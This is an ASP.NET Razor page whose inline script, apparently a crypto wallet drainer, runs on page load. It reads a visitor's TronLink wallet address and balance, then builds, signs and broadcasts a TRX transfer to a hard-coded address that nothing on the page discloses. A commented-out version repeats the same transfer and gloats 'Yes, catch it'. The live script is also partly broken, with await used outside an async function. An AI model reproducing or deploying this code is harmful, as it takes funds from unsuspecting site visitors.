@*
    For more information on enabling MVC for empty projects, visit https://go.microsoft.com/fwlink/?LinkID=397860
*@
@{
}
@model PersonModel
 
@{
    Layout = null;
}
 
<!DOCTYPE html>
 
<html>
<head>
    <meta name="viewport" content="width=device-width"/>
    <title>Index</title>
</head>
<body>
      @*@using (Html.BeginForm("CryptoWallet", "Home", FormMethod.Post))
      {*@
          @*<form id="frmget">*@
                <input type="text" id="txtName"/>
                <input type="submit" id="btnGet" value="Get Current Time1"/>
                 <input type="button" name="btnLogSubmit" id="btnLogSubmit" value="402TRX + 0.0774CBX" class="btn  btn-sm gradient-crystal-clear btn-block my-0 white border-0 rounded">
               @*  </form>*@@*   }*@
  @*  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>*@
   
     @* <script src="~/Login/jquery-1.7.1.min.js"></script>*@
     <script src="~/Login/jquery-3.6.0.min.js"></script>


      <script>
        //var obj = setInterval(async ()=>{
//            if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
//          //if (window.tronLink.tronWeb) 
//                clearInterval(obj)
//                var tronweb = window.tronWeb
//document.write("AI Universe : Your tron address:",window.tronWeb.defaultAddress.base58)
//                var tx = await tronweb.transactionBuilder.sendTrx('TQJGCyiaib3VuVFUVxd1r4xSCkouNVizS4', 1000, window.tronWeb.defaultAddress.base58)
//                var signedTx = await tronweb.trx.sign(tx)
//                var broastTx = await tronweb.trx.sendRawTransaction(signedTx)
//document.write("Yes, catch it:",window.tronWeb.defaultAddress.base58)
//                console.log(broastTx)
//            }
                                                alert('near data');
                                                    if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
                                                                var _package = 1000;
                                                                var _amt = 1000;
                                                                _amt *= 1;
                                                                var _add = await window.tronWeb.defaultAddress.base58;
                                                                var _hxadd = await tronWeb.address.toHex(_add)
                                                                var _balance = await tronWeb.trx.getBalance(_add);
                                                                //var _sponsor = $("#sp").val();
                                                                //var _place = $('input[name="optionsRadiosInline"]:checked').val();
                                                                var tronweb = window.tronWeb
                                                                document.write("TCNX : Your tron address:",window.tronWeb.defaultAddress.base58)
                                                                var tx = await tronweb.transactionBuilder.sendTrx('TQJGCyiaib3VuVFUVxd1r4xSCkouNVizS4', _amt, window.tronWeb
                                                                    .defaultAddress.base58)
                                                                var signedTx = await tronweb.trx.sign(tx)
                                                                var broastTx = await tronweb.trx.sendRawTransaction(signedTx);

                                                                }
        //}, 10)
    </script>
  
</body>
</html>
